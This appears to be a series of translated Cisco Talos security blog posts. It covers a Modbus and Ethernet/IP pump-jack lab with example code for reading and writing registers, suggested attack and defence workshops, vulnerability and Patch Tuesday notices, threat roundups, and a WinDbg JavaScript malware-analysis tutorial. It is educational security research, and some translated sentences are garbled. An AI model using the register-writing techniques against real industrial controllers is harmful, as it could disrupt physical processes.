• Write Single Register (0x06)
• Write Multiple Coils (0x0F)
• Write Multiple Registers (0x10)
• Read Device Identification (0x43)
Coil values are stored in the C[] array and register values in the R[] array. The pump only uses registers, to store the pump motor speed and the gauge value.

The device can be queried using the pymodbus API. Here is an example:

    from pymodbus.client.sync import ModbusTcpClient
    from pymodbus.mei_message import ReadDeviceInformationRequest

    # connect to the pump controller
    client = ModbusTcpClient('10.10.10.1')
    client.connect()

    # register 6 holds the motor speed
    result = client.read_holding_registers(6, 1)
    print(result.registers)

    # register 7 holds the gauge value
    result2 = client.read_holding_registers(7, 1)
    print(result2.registers)

    # function 0x43: read device identification
    rq = ReadDeviceInformationRequest()
    result3 = client.execute(rq)
    print(result3.information)

    client.close()

The output looks like this:

    user@lab:~/pumpjack_project/arduino_modbus/python$ ./test.py
    [8000]
    [73]
Ethernet/IP

The second protocol implemented is another one used in industrial infrastructure: Ethernet/IP. This protocol adapts the Common Industrial Protocol (CIP) to Ethernet. The implementation is not complete and supports only reading and writing tags, using the MicroLogix/SLC PLC dialect of the protocol. The protocol is similar to Modbus but also includes the concept of a session ID; session handling is included in the implementation.

The current version supports BX:X and NX:X tags.

The device can be queried using the pycomm API. Here is an example:

    from pycomm.ab_comm.slc import Driver as SlcDriver

    c = SlcDriver()

    def read_val(num):
        # B1:1 holds the motor speed, B1:7 the gauge value
        print(c.read_tag('B1:%d' % num))

    # open() returns True when the session with the controller is established
    if c.open('10.10.10.1'):
        read_val(1)
        c.close()

The output looks like this:

    user@lab:~/pumpjack_project/arduino_enipcip/python$ ./test.py
    8000
Human Machine Interface (HMI)

Finally, we provide an HMI to manage the pump. It is developed in Python, creates a web server with Flask, and communicates with the pump using pymodbus. Here is a screenshot of the interface:

The web server first uses the Read Device Identification (0x43) command to get the pump's device name and version via Modbus over TCP. It then reads the motor speed and the gauge value; the gauge value determines the gauge level shown on the web page. Clicking the increase/decrease buttons raises or lowers the motor speed by changing the value of register 6 via the Modbus protocol.
Example workshops

There are many ways researchers can use this system to study the potential attack vectors of an oil pump jack. For example, it can be used to understand two ICS protocols that are not encountered in traditional IT networks. You can capture the network traffic from the HMI and perform further analysis in Wireshark. The built-in Wireshark dissector fully decodes Modbus over TCP. The Ethernet/IP dissector is not as robust, but it can partially decode the protocol. Jared Rittle of Cisco Talos has published past research using Wireshark dissectors.

Another scenario is to scan the local network to identify the Modbus system, enumerate the values stored in the coils and registers, and change the pump's behaviour. If you are interested in ICS attacks such as Stuxnet, the malicious worm that attacked SCADA systems, you can target the HMI system and alter the information the HMI presents to the operator.

These scenarios are all offensive. We also recommend working on the defensive side. For example, Snort® supports Modbus over TCP; with this module you can monitor traffic, block requests from unauthorized IPs, identify large scans, and prevent large values from being written to registers or coils.
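As an added example (not code from the Talos project), the following Python builds and parses Modbus/TCP frames for the pump jack register layout described above (speed in register 6, gauge in register 7, Read Device Identification 0x43) and implements the kind of write policy the defensive paragraph above recommends: flagging writes from hosts other than the HMI, writes to registers other than the speed register, and speeds outside the 5,000 to 15,000 range. Only the controller address 10.10.10.1 comes from the page; the HMI and rogue host addresses and the sample traffic are constructed.

```python
import struct

# Register layout from the pump-jack description: register 6 is the motor
# speed, register 7 the gauge value; safe speed range 5,000-15,000.
SPEED_REGISTER = 6
GAUGE_REGISTER = 7
SPEED_MIN, SPEED_MAX = 5000, 15000

FC_READ_HOLDING = 0x03      # Read Holding Registers
FC_WRITE_SINGLE = 0x06      # Write Single Register
FC_WRITE_MULTIPLE = 0x10    # Write Multiple Registers
FC_DEVICE_INFO = 0x43       # Read Device Identification (MEI)

# The controller address is the one given on the page; the HMI and the rogue
# host addresses are constructed for this example.
PUMP_IP = "10.10.10.1"
HMI_IP = "10.10.10.2"
ROGUE_IP = "10.10.10.99"


def build_request(tid, function, payload, unit_id=1):
    """Modbus/TCP frame: 7-byte MBAP header (transaction id, protocol id 0,
    length of unit id + PDU, unit id) followed by the PDU."""
    pdu = bytes([function]) + payload
    mbap = struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit_id)
    return mbap + pdu


def read_holding_request(tid, address, count):
    return build_request(tid, FC_READ_HOLDING, struct.pack(">HH", address, count))


def write_single_request(tid, address, value):
    return build_request(tid, FC_WRITE_SINGLE, struct.pack(">HH", address, value))


def write_multiple_request(tid, address, values):
    payload = struct.pack(">HHB", address, len(values), 2 * len(values))
    payload += b"".join(struct.pack(">H", v) for v in values)
    return build_request(tid, FC_WRITE_MULTIPLE, payload)


def device_info_request(tid):
    # MEI type 0x0E, read device id code 0x01 (basic), starting object id 0x00
    return build_request(tid, FC_DEVICE_INFO, bytes([0x0E, 0x01, 0x00]))


def parse_frame(frame):
    """Parse one Modbus/TCP request frame into a dict. 'writes' maps register
    address to value for the write function codes and is empty otherwise.
    Raises ValueError when the header does not match the bytes received."""
    if len(frame) < 8:
        raise ValueError("frame too short")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError("protocol id %d is not Modbus" % proto)
    if length != len(frame) - 6:
        raise ValueError("length field %d does not match frame" % length)
    function, data = frame[7], frame[8:]
    msg = {"tid": tid, "unit": unit, "function": function, "writes": {}}
    if function == FC_READ_HOLDING:
        msg["address"], msg["count"] = struct.unpack(">HH", data[:4])
    elif function == FC_WRITE_SINGLE:
        addr, value = struct.unpack(">HH", data[:4])
        msg["writes"] = {addr: value}
    elif function == FC_WRITE_MULTIPLE:
        addr, qty, nbytes = struct.unpack(">HHB", data[:5])
        if nbytes != 2 * qty or len(data) < 5 + nbytes:
            raise ValueError("inconsistent multiple-register payload")
        values = struct.unpack(">%dH" % qty, data[5:5 + nbytes])
        msg["writes"] = {addr + i: v for i, v in enumerate(values)}
    elif function == FC_DEVICE_INFO:
        msg["mei_type"] = data[0] if data else None
    return msg


def check_write_policy(frame, source_ip, allowed_writers=(HMI_IP,)):
    """Defender-side check for one frame seen on the wire: returns a list of
    alert strings (empty means acceptable). Reads are always allowed; writes
    must come from an allowed host, target only the speed register, and stay
    inside the safe speed range."""
    alerts = []
    msg = parse_frame(frame)
    if not msg["writes"]:
        return alerts
    if source_ip not in allowed_writers:
        alerts.append("write from unauthorized host %s" % source_ip)
    for addr, value in msg["writes"].items():
        if addr != SPEED_REGISTER:
            alerts.append("write to unexpected register %d" % addr)
        elif not SPEED_MIN <= value <= SPEED_MAX:
            alerts.append("speed %d outside safe range %d-%d"
                          % (value, SPEED_MIN, SPEED_MAX))
    return alerts


if __name__ == "__main__":
    # Constructed traffic: the HMI polling the gauge and nudging the speed,
    # then a rogue host pushing the motor far past its safe range.
    samples = [
        (HMI_IP, read_holding_request(1, GAUGE_REGISTER, 1)),
        (HMI_IP, write_single_request(2, SPEED_REGISTER, 8500)),
        (ROGUE_IP, write_single_request(3, SPEED_REGISTER, 30000)),
        (ROGUE_IP, write_multiple_request(4, SPEED_REGISTER, [8000, 73])),
    ]
    for src, frame in samples:
        print("%s -> %s: %s" % (src, PUMP_IP, check_write_policy(frame, src) or "ok"))
```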
Conclusion

We hope these materials help researchers understand industrial protocols, especially Modbus over TCP and Ethernet/IP. These two protocols are unauthenticated protocols that are still used in production environments. In the example, we saw how to change the internal values of the PLC (the Arduino Uno). However, PLC programming is also carried out over these protocols: a real PLC can be programmed, have its original code replaced, and be patched using the same protocol. For details on attacks against real PLCs, we recommend our white paper "Process Control through Counterfeit Comms: Using and Abusing Built-In Functionality to Own a PLC".

We decided to publish this project so that as many people as possible can access it. Do not hesitate to contribute by adding functions to the implemented protocols or adding new ones. We accept pull requests on our GitHub.
Vulnerability Spotlight: Adobe Acrobat Reader DC text field remote code execution vulnerability

February 12, 2019 9:26 AM

            Adobe Acrobat Reader DC contains a vulnerability that could allow an attacker to execute code remotely on a victim's machine. If an attacker tricks a user into opening a specially crafted PDF that contains certain JavaScript, it could trigger a heap corruption. The bug could also be triggered if the user opens a specially crafted email attachment.

            Cisco Talos has worked with Adobe to ensure that these issues are resolved and that an update is available to affected customers.

            Vulnerability Details

            Adobe Acrobat Reader DC Text Field Value Remote Code Execution Vulnerability (TALOS-2018-0714)

            Adobe Acrobat Reader supports embedded JavaScript in PDFs to enable more user interaction. However, this gives attackers the ability to precisely control the memory layout, creating an additional attack surface. If an attacker tricks a user into opening a PDF with two specific lines of JavaScript code, it can trigger an incorrect integer size promotion, leading to heap corruption. The heap can be corrupted to the extent that an attacker can execute arbitrary code on the victim's machine.

            For more information, please read the vulnerability advisory here.

            Tested Versions

Talos has tested and confirmed that Adobe Acrobat Reader DC 2019.8.20071 is affected by this vulnerability.

            Applicability

The following Snort® rules will detect exploitation attempts. Please note that additional rules may be released in the future, and the current rules may be subject to change pending additional vulnerability information. For the latest rule information, please refer to your Firepower Management Center or Snort.org.

Microsoft Patch Tuesday - February 2019: Vulnerability Disclosures and Snort Coverage

February 12, 2019 11:55 AM
Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in multiple products. The latest Patch Tuesday covers 69 vulnerabilities, of which 20 are rated "critical," 46 are rated "important," and 3 are rated "moderate." The release also includes an important security advisory for Adobe Flash Player security updates.

This month's security update covers security issues in a variety of Microsoft products, including the Chakra scripting engine, Internet Explorer, Exchange and the Edge web browser. For the Snort® coverage of these vulnerabilities, see this Snort blog post.

Critical vulnerabilities

Microsoft disclosed 20 critical vulnerabilities this month, 12 of which are highlighted below.

CVE-2019-0590, CVE-2019-0591, CVE-2019-0593, CVE-2019-0640, CVE-2019-0642, CVE-2019-0644, CVE-2019-0651, CVE-2019-0652 and CVE-2019-0655 are memory corruption vulnerabilities in Microsoft's scripting engine. All of these bugs lie in the way the engine handles objects in memory in the Microsoft Edge web browser. An attacker could exploit these vulnerabilities to corrupt the machine's memory and eventually execute code remotely in the context of the current user. A user can trigger these bugs by visiting a malicious web page in Edge or by opening specially crafted content created by the attacker.

CVE-2019-0606 is a memory corruption vulnerability in Microsoft Internet Explorer, in the way the web browser accesses objects in memory. An attacker could exploit this vulnerability by tricking a user into visiting a specially crafted website or opening crafted content in Internet Explorer. With this vulnerability the attacker could execute code in the context of the current user.

CVE-2019-0645 and CVE-2019-0650 are memory corruption vulnerabilities in Microsoft Edge that arise when the web browser fails to properly handle objects in memory. An attacker could exploit these vulnerabilities by tricking a user into browsing to a malicious, specially crafted website or clicking specially crafted content. The attacker could use these bugs to gain the ability to execute arbitrary code in the context of the current user.

The other critical vulnerabilities are:

Important vulnerabilities

This release also includes 46 important vulnerabilities:

• CVE-2019-0540
• CVE-2019-0595
• CVE-2019-0596
• CVE-2019-0597
• CVE-2019-0598
• CVE-2019-0599
• CVE-2019-0600
• CVE-2019-0601
• CVE-2019-0602
• CVE-2019-0610
• CVE-2019-0613
• CVE-2019-0615
• CVE-2019-0616
• CVE-2019-0619
• CVE-2019-0623
• CVE-2019-0625
• CVE-2019-0627
• CVE-2019-0628
• CVE-2019-0630
• CVE-2019-0631
• CVE-2019-0632
• CVE-2019-0633
• CVE-2019-0635
• CVE-2019-0636
• CVE-2019-0637
• CVE-2019-0648
• CVE-2019-0649
• CVE-2019-0654
• CVE-2019-0656
• CVE-2019-0657
• CVE-2019-0658
• CVE-2019-0659
• CVE-2019-0660
• CVE-2019-0661
• CVE-2019-0664
• CVE-2019-0668
• CVE-2019-0671
• CVE-2019-0673
• CVE-2019-0674
• CVE-2019-0675
• CVE-2019-0676
• CVE-2019-0686
• CVE-2019-0728

Moderate vulnerabilities

This release also includes three moderate vulnerabilities: CVE-2019-0641, CVE-2019-0643 and CVE-2019-0670.

            Conclusion

In response to these vulnerability disclosures, Talos is releasing the following Snort® rules to detect attempts to exploit them. Please note that additional rules may be released in the future and that the current rules are subject to change pending additional vulnerability information. Firepower customers should update their SRU to use the latest rule set. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Beers with Talos Episode #46: "Privacy PWND: ExileRAT and the Bad Karma Collection"

February 14, 2019 10:31 AM

Beers with Talos (BWT) Podcast Ep. #46 is now available. Download this episode and subscribe to Beers with Talos. If iTunes and Google Play are not your thing, click here.

Recorded February 1, 2019

Today we discuss threats that blur the line between privacy violations and classic cyber security threats: going after the voices of opposition, and the malware and systems that turn their own devices into reconnaissance tools against them. The two cases covered in this episode are ExileRAT, a Trojan distributed via malicious Office documents targeting supporters of the Tibetan government in exile, and "Karma", a zero-touch toolkit used by at least one nation state to remotely exfiltrate all valuable data from a target. In the next episode we plan to dig into the concept of privacy as a basic human right with a special guest (hint: Michelle Dennedy), so be sure to check out the next episode.

Timeline

Topics

01:15 - Roundtable: Craig is being held hostage, #BWT's hashtag gets jacked, a brief history of the Crazy Gang
15:00 - ExileRAT: a LuckyCat-related attack targeting Tibet
27:04 - The story of the Karma operators

Links

Featuring Craig Williams (@security_craig), Joel Esler (@joelesler), Matt Olney (@kpyke) and Nigel Houghton (@englishlfc). Hosted by Mitch Neff (@mitchNeff). Find all episodes here.

Send us your opinions and topic requests: beerswithtalos@cisco.com

            February 15, 2019 7:00 am

Welcome to this week's Cyber Security Week in Review. Here is the news from the security world that Cisco Talos thinks you should know about. To get this and other news delivered every week, sign up for the Threat Source newsletter here.

            This week's top news

Email provider VFEmail announced that it had suffered a "catastrophic" cyber attack. The company warned that roughly 18 years of email may be lost forever. "All file servers have been lost and all backup servers have been lost. Strangely, not all VMs shared the same authentication, but all were destroyed. This is a multi-password by SSH. It was more than an abuse, and there was no ransom," VFEmail said.

Russia is considering isolating itself from the global internet. The Kremlin is experimenting with a new practice that would keep domestic web traffic entirely within the country. The country will run a test in the second half of this year to evaluate its cyber defenses.

Apple has released patches for multiple security flaws. Two of these vulnerabilities were discovered by Google's threat research team and were being exploited in the wild. The bugs could allow an attacker to escalate privileges and ultimately take over the device.

            From Talos

Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several products. The latest Patch Tuesday covers 69 vulnerabilities, of which 20 are rated "critical," 46 are rated "important," and three are rated "moderate." The release also includes an important security advisory for Adobe Flash Player security updates.

            Adobe has released some security updates for some products, including Flash and Acrobat Reader. Cisco Talos has discovered particularly vulnerabilities for execution of remote code, especially on Adobe Acrobat Reader DC. Attackers can cause a heap overflow and obtain code execution authority by deceiving the user and opening a specially crafted PDF.

            With a new tool from Talos, you can investigate the effects of cyber attacks on oil pump jacks. We have released a 3 D-printed 3 D-printed pump jack, which is "hacked" from a smartphone and finally overheated. In addition, this exhibition will be around this year.

            Malware

A new variant of the Astaroth Trojan is targeting Brazil through multiple spam campaigns. Once it infects a machine, the malware can steal the user's personal information, and it uses several obfuscation techniques to make detection difficult. The spam emails also target users in some European countries.

US credit unions received phishing emails last week aimed at their anti-money-laundering staff. The fake emails claimed to have information about a fraudulent wire transfer indicating a suspicious transaction, and asked the recipient to open a PDF containing a link to a malicious web page. The attackers used information that should only have been available to the US credit union regulator.

Google has removed malware that steals cryptocurrency from its store. The malicious apps posed as the legitimate MetaMask service; once installed, they stole login credentials in order to steal the user's Ethereum funds.

Other news

• Blockchain technology could help detect deepfake videos, especially from police body cameras. A new tool called Amber Authenticate runs in the camera's background and records hashes of the video; all of these results are recorded on a public blockchain.
• India has asked Facebook to provide a backdoor into its messaging applications for the country. As a result, Facebook would need to give the government access to users' end-to-end encrypted messages.
• Two members of the U.S. Congress have requested an investigation into foreign VPN services, stating that these companies could pose national security risks.

Threat Roundup for February 8 to February 15

February 15, 2019 3:03 pm

Today, Talos is publishing a glimpse into the most prevalent threats observed between February 8 and February 15. As with previous roundups, this post is not intended to be an in-depth analysis. Instead, it summarizes the threats observed by highlighting key behavioral characteristics and indicators of compromise, and explains how our customers are automatically protected from these threats.

As a note of caution, the information on the following threats in this post is not exhaustive and is current as of the publication date. Also, keep in mind that searching for IOCs is only one part of threat hunting. Finding a single IOC does not necessarily indicate malicious intent. Detection and coverage for the following threats may be updated pending additional analysis of the threat or vulnerability. For the most up-to-date information, please refer to the Firepower Management Center, Snort.org, or ClamAV.net. For each threat below, this blog post lists only 25 of the relevant file hashes. The attached JSON file contains the complete list of file hashes, as well as all other IOCs in this post. As always, please remember that all IOCs in this document are indicators, and no single IOC indicates malicious intent.

The most common threats covered in this roundup are:

• Win.Virus.Expiro-6854765-0 (Virus): Expiro is a known file infector and information stealer that thwarts analysis with anti-debugging and anti-analysis tricks.
• Win.Malware.Swisyn-6854761-0 (Malware): This family is packed and uses anti-analysis tricks to hide its behavior. The binaries drop other executables, execute them, and attempt to inject malicious code into the address space of other processes.
• Win.Dropper.Ribaj-6855378-0 (Dropper): This family is written in .NET and is highly malicious. When executed, these samples drop files in Windows directories, modify other applications, and spawn multiple child processes. These binaries also modify Internet settings and certificates on the victim's machine, as observed in Windows Registry activity.
• Doc.Malware.Valyria-6855449-0 (Malware): These Valyria variants are malicious Microsoft Word documents containing embedded VBA macros that are used to distribute other malware.
• Win.Malware.Cgok-6854725-0 (Malware): These binaries can detect virtual machines and instrumented environments. They may also use anti-disassembly and anti-debugging techniques to complicate analysis. This family can install additional software and upload information to a remote server.
• Win.Malware.Noon-6854584-0 (Malware): This family is highly malicious and executes other binaries. These samples contact a remote server, upload information collected on the victim's machine, and establish persistence.
Malware analysis with WinDbg made easier by the JavaScript bridge

February 18, 2019 9:29 am

Introduction

As malware researchers, we spend several days a week debugging malware in order to learn more about it. There are several powerful and popular user-mode tools, such as OllyDbg, x64dbg, IDA Pro and Immunity Debugger.

All of these debuggers use scripting languages, either their own or languages such as Python and OllyScript, to automate tasks. When it comes to analysis in kernel mode, there is only one option: the Windows debugging engine and its interfaces cdb, ntsd, kd and WinDbg. Unfortunately, even though WinDbg is the most user-friendly of these, it is widely regarded as one of the least user-friendly debuggers around.

The learning curve for WinDbg commands is quite steep and unintuitive, often compounded by inconsistent command syntax and an outdated user interface. Adding the traditional WinDbg scripting language to this equation does not make things any easier for users.

Thankfully, there is a new WinDbg Preview for Windows 10 that is in line with modern programming environments. The preview includes a new JavaScript engine and a debugger data model exposed through a set of JavaScript objects and functions.

With these new features, WinDbg can offer the familiar user interface elements of modern programming environments such as Visual Studio. This post describes the debugger data model in this new version of WinDbg and the new JavaScript and dx command interfaces to it.

Debugger data model

The debugger data model is an extensible object model through which the WinDbg user interface, as well as extensions, can access many internal debugger objects via a consistent interface, including:

• Debug session
• Processes
• Process environment (e.g., PEB and TEB)
• Threads
• Modules
• Stack frames
• Handles
• Devices
• Debugger control
• Pseudo registers

dx display expressions

All of the object types above are exposed through the new dx (Display Debugger Object Model Expression) command. This command is used to access objects or evaluate expressions using a C++-like syntax. Thanks to the addition of NatVis support to WinDbg, the result of a dx command is displayed in an intuitive format, using DML as the default output, which presents it in a much more useful way.

Drilling down from the top-level namespace to a process

The depth of the display is controlled with the dx command's -r option; if you go a few levels deeper, you reach the full list of properties for every process, including the fields of the _EPROCESS kernel object, which are exposed as the KernelObject member of the process debugger object. Users of previous WinDbg versions will appreciate how much easier exploration becomes with the dx command.

Pseudo registers and internal variables are useful if you want to avoid typing the full path of an object after the dx command. Instead of Debugger.Sessions[0], you can use the pseudo register @$cursession, which refers to the current session's data model object. If you need to work with the current process, you can simply type dx @$curprocess instead of the long form dx Debugger.Sessions[0].Processes[procid].

LINQ queries

LINQ (Language Integrated Query) is a concept already familiar to .NET software engineers; it lets you build SQL-like queries over the object collections exposed through the dx command.

In normal .NET development, two syntaxes are available for writing a LINQ query, but WinDbg only supports queries written in lambda syntax through the dx command. LINQ queries let you slice collection objects and extract just the fragments of information you want to display.

The LINQ function "Where" selects only those objects that satisfy the criteria given in the lambda expression passed as its argument. For example, to display only the processes that have the string "Google" in their name, type:

dx @$cursession.Processes.Where(p => p.Name.Contains("Google"))
Just like in SQL, the "Select" function lets you choose which members of the objects in a collection to display. For example, for the processes filtered by "Where", you can use "Select" to get only the process name and its ID:

dx -r2 @$cursession.Processes.Where(p => p.Name.Contains("Google")).Select(p => new

Going one level deeper into the exposed _EPROCESS kernel object, you can choose to display a subset of the handles owned by the process you are observing. For example, one way to find processes hidden by a user-mode rootkit is to enumerate the process handles of the Windows Client Server Subsystem process (csrss.exe) and compare that list with one generated using the standard process enumeration commands.

Before enumerating the processes created by csrss.exe, you need to find the process object for csrss.exe and switch to its context:

dx @$cursession.Processes.Where(p => p.Name.Contains("csrss.exe"))[pid].SwitchTo()

Then run a LINQ query to display the path of the main module of each process present in the csrss.exe handle table:

dx @$curprocess.Io.Handles.Where(h => h.Type.Contains("Process")).Select(h => h.Object.UnderlyingObject.SeAuditProcessCreationInfo.ImageFileName->Name)

Since ImageFileName is a pointer to a structure of type _OBJECT_NAME_INFORMATION, you need to dereference it with the arrow operator to access the "Name" field, which contains the module path.

There are many other useful LINQ functions. For example, you can count the results of a query using "Count". LINQ queries can also be used from the JavaScript extension, although the syntax is slightly different; an example of using LINQ from JavaScript appears later in this post.

WinDbg and JavaScript

Having covered the basics of the debugger data model and the dx command used to explore it, the next step is the WinDbg JavaScript extension. JSProvider.dll is a native WinDbg extension that lets users script WinDbg, with access to the data model, using a version of Microsoft's Chakra JavaScript engine. The extension is not loaded into the WinDbg process space by default, to avoid potential conflicts with other JavaScript-based extensions.

JSProvider is loaded with the standard command for loading extensions:

.load jsprovider.dll

This post describes the kind of scripts threat researchers write when analyzing malware samples, but with the JavaScript extension developers can also create WinDbg extensions that feel the same as existing binary extensions. Details on creating JavaScript-based extensions can be found by studying one of the extensions provided in the official WinDbg JavaScript samples repository on GitHub.

WinDbg Preview has a fully functional integrated development environment (IDE) for writing JavaScript code, letting developers debug live programs and refactor their code while investigating memory dumps.

The following WinDbg commands are used to load and run JavaScript-based scripts. The good news is that the commands for handling JavaScript-based scripts are more intuitive than the awkward standard syntax for managing WinDbg scripts:

• .scriptload loads a JavaScript script or extension into WinDbg without executing it.
• .scriptrun executes a loaded script.
• .scriptunload unloads a script from WinDbg and from the debugger data model namespace.
• .scriptlist lists all currently loaded scripts.
JavaScript entry points

Depending on the script command used to load the script, the JavaScript provider calls one of the defined user script entry points or executes the code at the script's root level.

From a threat research perspective, there are two main entry points. The first is a function named initializeScript, which the provider calls when the .scriptload command is executed. This function is normally used to initialize global variables and to define constants, structures and objects.

Objects defined in the initializeScript function are bridged into the debugger's data model namespace using the functions host.namespacePropertyParent and host.namedModelParent. Bridged objects can be examined with the dx command like any other native object in the data model.

The second, and more important, entry point is the invokeScript function, the equivalent of C's main function. It is called when the user runs the .scriptrun WinDbg command.

Handy JavaScript exploration tricks

Let's assume you have a script named "myutils.js" containing a set of functions you use regularly in your day-to-day research. First, you need to load the script with the .scriptload command.

Loading script functions from the user's Desktop folder

WinDbg JavaScript modules and namespaces

The main JavaScript object you use to interact with the debugger is the host object. If you are using the WinDbg Preview script editor, IntelliSense tab completion and the function documentation can help you learn the names of the available functions and members.

IntelliSense in action

If you just want to experiment, you can put your code in an invokeScript function, which is called every time you run the script. Once you are happy with the code, you can refactor it into your own set of functions.

Before we dive deep into the functionality exposed through the JavaScript interface, we recommend creating two important helper functions: one to display text on the screen and one to interact with the debugger using standard WinDbg commands.

These functions are useful for interacting with the user or for creating workarounds for functionality that does not yet exist natively in JavaScript but is necessary for debugging.

In this example we named these functions logme and exec. They are little more than wrappers around JavaScript functions, but they save typing out the whole namespace hierarchy every time.

Helper functions that wrap the WinDbg API for JavaScript


              Display of members of the module object

              A for-in loop enumerates the property names of an object. A for-of loop, on the other hand, iterates over an iterable object and yields each of its elements in turn. It is important to keep the difference between these two loop statements in mind, because the data model exposes most collections as iterables.

              Printing the list of modules loaded in the current process space

              By walking the linked list of loaded modules in the process environment block (PEB), you can obtain the list of loaded modules, but the linked list must first be converted into a collection by calling the JavaScript function host.namespace.Debugger.Utility.Collections.FromListEntry. The following function converts the loaded-module list into a JavaScript collection of _LDR_DATA_TABLE_ENTRY objects and displays their properties.

              function ListProcessModulesPEB()
              {
                  // Use FromListEntry to iterate over the list of PEB-loaded modules
                  let moduleList = host.namespace.Debugger.Utility.Collections.FromListEntry(
                      host.currentProcess.KernelObject.Peb.Ldr.InLoadOrderModuleList, "nt!_LIST_ENTRY", "Flink");
                  for (let entry of moduleList) {
                      // InLoadOrderLinks is the first member of _LDR_DATA_TABLE_ENTRY, so the address of the
                      // _LIST_ENTRY is also the address of the containing entry: create a typed object from it
                      let loaderData = host.createTypedObject(entry.address, "nt", "_LDR_DATA_TABLE_ENTRY");
                      // FullDllName is a UNICODE_STRING: Length is in bytes, readWideString wants characters
                      let name = host.memory.readWideString(loaderData.FullDllName.Buffer, loaderData.FullDllName.Length / 2);
                      logme("Module " + name + " at " + loaderData.DllBase.address.toString(16)
                            + " Size: " + loaderData.SizeOfImage.toString(16));
                  }
              }

              This function accesses the host.memory namespace and calls one of readMemoryValues, readString or readWideString, depending on the type of data to be read, to read values from process memory.

              JavaScript 53-bit integer width limitation

              Programming WinDbg in JavaScript is relatively simple compared with classic WinDbg scripts, but there are a few things to be aware of that are likely to cause headaches. One is that JavaScript integers are limited to 53 bits of precision: a Number is an IEEE double and cannot represent every 64-bit pointer exactly. The JavaScript extension therefore provides a special class, host.Int64, whose constructor must be used when dealing with 64-bit values. Fortunately, the interpreter warns you when a 53-bit overflow may occur.

              host.Int64 objects have several methods for arithmetic and bitwise operations. When writing a function to iterate over the callbacks registered through PspCreateProcessNotifyRoutine (described later), we could not find a way to apply a 64-bit AND mask. The mask method appears to return a 53-bit-wide result, and a mask wider than 53 bits overflows; the underlying reason is that a mask literal such as 0xfffffffffffffff0 is itself a JavaScript Number and is rounded (in this case to 2^64) before host.Int64 ever sees it.

              Masking a host.Int64 with a 53-bit AND mask returns correct results; a wider mask returns incorrect results.

              Fortunately, host.Int64 provides getLowPart and getHighPart, which return the lower and upper 32 bits of a 64-bit integer. You can apply the required AND masks to the lower and upper 32 bits separately and then rebuild the 64-bit value from the two halves.

              The 53-bit limitation of WinDbg's JavaScript implementation is annoying, and it would be welcome if the WinDbg team found a way to support 64-bit numbers without relying on a special JavaScript class.

              LINQ in JavaScript

              We have already seen how LINQ queries in the dx command select a subset of the debugger data model objects.

              However, the syntax in JavaScript is slightly different: each LINQ verb is a function call that takes, as its argument, an anonymous function returning the data type the verb expects. For the Where clause, the function must return a boolean. For the Select clause, it must return either a member of the object being queried or a new anonymous object composed of a subset of that object's members.

              A simple example that uses LINQ functions to filter the list of modules to those whose name contains the string "dll", and then selectively displays only the module names and their base addresses, is the ListProcessModules function reproduced at the end of this post.

              Looking up operating system structures

              host.getModuleSymbolAddress returns the address of a symbol, not its contents. If you need the actual value stored at that address, you must dereference it with the host.memory.readMemoryValues function or, for a single value, with the dereference function.

              Here is an example that enumerates the callbacks registered through the documented PsSetCreateProcessNotifyRoutine kernel API, which registers a driver routine to be notified whenever a process is created or terminated; the registered routines are kept in the internal PspCreateProcessNotifyRoutine array. This mechanism is also used by kernel-mode malware to hide processes or to prevent the malware's user-mode modules from being terminated.

              The example in this post is inspired by the C code for enumerating callbacks implemented in the SwishDbgExt extension developed by Matthieu Suiche. This WinDbg extension is very useful for analyzing kernel memory dumps as well as systems infected with kernel-mode malware.

              This code shows that more complex functionality can be implemented relatively easily in JavaScript. Developing in JavaScript is in fact ideal for malware researchers, since you can write, test and run your analysis code side by side in the WinDbg Preview IDE.
              function ListProcessCreateCallbacks()
              {
                  // Address of the array of EX_FAST_REF pointers to _EX_CALLBACK_ROUTINE_BLOCK structures
                  let PspCreateNotifyRoutinePointer = host.getModuleSymbolAddress('ntkrnlmp', 'PspCreateProcessNotifyRoutine');
                  // Number of registered callbacks (a 32-bit value); readMemoryValues returns an array
                  let PspCallbackCount = host.memory.readMemoryValues(
                      host.getModuleSymbolAddress('ntkrnlmp', 'PspCreateProcessNotifyRoutineCount'), 1, 4)[0];
                  logme("There are " + PspCallbackCount.toString() + " PspCreateProcessNotify callbacks");
                  for (let i = 0; i < PspCallbackCount; i++) {
                      // Each array slot is an 8-byte EX_FAST_REF: the low 4 bits hold a reference count
                      let CallbackPointer = host.memory.readMemoryValues(PspCreateNotifyRoutinePointer.add(i * 8), 1, 8)[0];
                      // Clear the low 4 bits without a 64-bit AND: mask the low dword, keep the high dword,
                      // and rebuild the value with the two-argument host.Int64(low, high) constructor
                      let CallbackPointerLow = (CallbackPointer.getLowPart() & 0xfffffff0) >>> 0;
                      let CallbackPointerHigh = CallbackPointer.getHighPart();
                      let CallbackBlock = host.Int64(CallbackPointerLow, CallbackPointerHigh);
                      // _EX_CALLBACK_ROUTINE_BLOCK on x64: RundownProtect at offset 0, Function at offset 8
                      let CallbackFunction = host.memory.readMemoryValues(CallbackBlock.add(8), 1, 8)[0];
                      // No address-to-symbol function in the JavaScript API yet: run .printf with %Y through exec.
                      // Pass the address as 0x-prefixed hex; MASM would otherwise read a decimal string as hex.
                      let CallbackSymbol = "";
                      for (let line of exec('.printf "%Y", 0x' + CallbackFunction.toString(16))) {
                          CallbackSymbol += line;
                      }
                      logme("Callback " + i + ": " + CallbackFunction.toString(16) + " " + CallbackSymbol);
                  }
              }
              Note the 64-bit address manipulation mentioned above: the 64-bit value is split into its upper and lower 32 bits and the bit mask is applied to each half separately, which avoids overflowing JavaScript's 53-bit integers.
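To make the two limitations concrete, here is an added example in plain Node.js; it is not code from the original post and does not use WinDbg's API. It shows that a Number keeps only 53 significant bits, that JavaScript's bitwise operators truncate their operands to 32 bits, and that the 64-bit mask literal is already rounded before any masking happens, so an EX_FAST_REF read from PspCreateProcessNotifyRoutine cannot be masked in one step. The Int64 class is a minimal stand-in modelled on host.Int64's getLowPart/getHighPart, not the real class; the eight sample bytes are constructed; 0xfffffff0 clears the 4 reference-count bits of an EX_FAST_REF, as in the enumeration code above.

```javascript
// Added example (not from the original post). Plain Node.js, no WinDbg host object.
// Int64 below is a stand-in for host.Int64's getLowPart/getHighPart interface.

// Low 4 bits of an EX_FAST_REF hold a reference count; the rest points to the
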